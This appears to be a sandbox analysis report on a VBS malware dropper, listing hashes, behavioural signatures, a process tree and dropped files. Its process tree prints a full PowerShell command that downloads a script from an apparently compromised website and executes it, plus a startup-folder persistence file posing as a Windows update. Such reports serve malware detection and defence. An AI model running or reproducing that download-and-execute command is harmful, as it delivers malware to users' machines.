Analysis
- max time kernel: 144s
- max time network: 153s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 26-08-2021 12:19
Static task: static1
Behavioral task: behavioral1
- Sample: NUF77882993883JJS01.vbs
- Resource: win7v20210408
General
- Target: NUF77882993883JJS01.vbs
- Size: 15KB
- MD5: 6adbdc4f8416b3002c17f67f6fc68471
- SHA1: 23b7fbbe29a977a9b6f0b7739daa81901b5c5508
- SHA256: 8f47c6601f5a5bdaa0a35ae18b93451bbfc674219adb8e896e25085f326dd32f
- SHA512: d2caa17b0ff821a1e30d038c33c8c3bfd6aff49061e758697f47b2e063b276f25b8daa4916d4b653fefaa78632a8e6a29f43a42d4e244a795e1945647a5fad17
Malware Config
- Extracted: http://sylvaniaindianrestaurant.com.au/wp-includes/FR7501.txt
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes:
  flow | pid  | process
  8    | 908  | powershell.exe
  13   | 2908 | powershell.exe
- Drops startup file (1 IoCs)
  Processes:
  description  | ioc                                                                                                   | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows10DecemberUpdate.vbs | powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes:
  pid  | process
  908  | powershell.exe
  908  | powershell.exe
  908  | powershell.exe
  2908 | powershell.exe
  2908 | powershell.exe
  2908 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
  description              | pid  | process
  Token: SeDebugPrivilege  | 908  | powershell.exe
  Token: SeDebugPrivilege  | 2908 | powershell.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
  description                      | pid  | process        | target process
  PID 3728 wrote to memory of 908  | 3728 | WScript.exe    | powershell.exe
  PID 3728 wrote to memory of 908  | 3728 | WScript.exe    | powershell.exe
  PID 908 wrote to memory of 2908  | 908  | powershell.exe | powershell.exe
  PID 908 wrote to memory of 2908  | 908  | powershell.exe | powershell.exe
Processes (tree; PIDs taken from the WriteProcessMemory signature above)
- C:\Windows\System32\WScript.exe (PID 3728)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUF77882993883JJS01.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 908)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient]$WEB=New-Object System.Net.WebClient;$WEB.DownloadFile('http://sylvaniaindianrestaurant.com.au/wp-includes/FR7501.txt','C:\Users\Public\FR7501.PS1');PowerShell -File C:\Users\Public\FR7501.PS1
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2908)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\FR7501.PS1
      - Blocklisted process makes network request
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\FR7501.PS1
  MD5: 5480fceef4e5290938cb0a23955358df
  SHA1: 891c237730a39b36bd443e485d3493f5f7ff68c5
  SHA256: d9cfdea62d4a3acc5ec47cfc0349002af129add61611a0810b73394bc7ea3020
  SHA512: 3cf3bef1f0d02ba68d5656e842a58b001aa4ba7b67ab1e21d93b8f2efa604283c58224bd8f8a208b09ab14e1443f78e4da7dbbbd1f1edfaa60316ae1056be392
- memory/908-114-0x0000000000000000-mapping.dmp
- memory/908-119-0x00000160C3760000-0x00000160C3761000-memory.dmp (Filesize: 4KB)
- memory/908-122-0x00000160DBDC0000-0x00000160DBDC1000-memory.dmp (Filesize: 4KB)
- memory/908-125-0x00000160DBBB0000-0x00000160DBBB2000-memory.dmp (Filesize: 8KB)
- memory/908-127-0x00000160DBBB3000-0x00000160DBBB5000-memory.dmp (Filesize: 8KB)
- memory/908-134-0x00000160DBBB6000-0x00000160DBBB8000-memory.dmp (Filesize: 8KB)
- memory/2908-129-0x0000000000000000-mapping.dmp
- memory/2908-135-0x0000025ABA5C0000-0x0000025ABA5C2000-memory.dmp (Filesize: 8KB)
- memory/2908-136-0x0000025ABA5C3000-0x0000025ABA5C5000-memory.dmp (Filesize: 8KB)
- memory/2908-178-0x0000025ABA5C6000-0x0000025ABA5C8000-memory.dmp (Filesize: 8KB)